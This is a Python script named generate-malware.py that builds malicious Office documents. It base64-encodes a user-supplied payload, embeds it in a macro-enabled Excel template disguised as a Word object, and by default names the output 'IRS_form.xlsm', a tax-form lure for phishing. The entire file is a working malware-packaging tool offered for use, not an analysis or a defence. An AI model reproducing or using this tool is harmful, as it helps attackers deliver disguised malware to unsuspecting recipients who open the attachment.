generate-malware.py

#!/usr/bin/env python
import os
import zipfile
import optparse
import base64
import tempfile
import random
import shutil


def insert_payload(zipname, filename, payload):
	if zipname is None:
		return False
	if not os.path.isfile(zipname):
		return False

	# generate a temp file
	tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))
	os.close(tmpfd)

	# create a temp copy of the archive without filename
	with zipfile.ZipFile(zipname, 'r') as zin:
		with zipfile.ZipFile(tmpname, 'w') as zout:
			zout.comment = zin.comment  # preserve the comment
			for item in zin.infolist():
				if item.filename != filename:
					zout.writestr(item, zin.read(item.filename))

	# replace with the temp archive
	os.remove(zipname)
	os.rename(tmpname, zipname)

	# now add filename with its new data
	with zipfile.ZipFile(zipname, mode='a',
		compression=zipfile.ZIP_DEFLATED) as zf:
		with open(payload, "rb") as payload_file:
			zf.writestr(filename, payload_file.read())
	return True


def convert_payload(payload, folder):
	temp_file = os.path.join(folder, "payload.tmp")
	if payload is None:
		return None
	if not os.path.isfile(payload):
		return None
	with open(payload, "rb") as payload_file:
		encoded_string = base64.b64encode(payload_file.read())
		payload_file.close()
	with open(temp_file, "wb") as encoded_file:
		encoded_file.write(encoded_string)
		encoded_file.close()
	return temp_file


def main():
	parser = optparse.OptionParser()
	parser.add_option('-p', '--payload',
		dest="payload_filename", default=None)
	parser.add_option('-t', '--template',
		dest="template_filename", default="template-doc/Workbook1.xlsm")
	parser.add_option('-o', '--output',
		dest="output_filename", default="IRS_form.xlsm")
	
	options, args = parser.parse_args()
	# print options, args
	print options.template_filename

	# create a temp directory
	folder = "temp."+str(random.random())
	os.makedirs(folder)
	encoded_payload = convert_payload(options.payload_filename, folder)
	if encoded_payload is None:
		print "Error: Payload is invalid"
		return
	if not os.path.isfile(encoded_payload):
		print "Error: Payload is not a file"
		return
	print encoded_payload
	# Copy template to temp folder
	output_file = os.path.join(folder, options.output_filename)
	shutil.copyfile(options.template_filename, output_file)
	if insert_payload(output_file,
		"xl/embeddings/Microsoft_Word_Document2.docx", encoded_payload):
		print "Successful"
		print "Saved as %s" % output_file
	else:
		print "Failed"
	return


if __name__ == '__main__':
	main()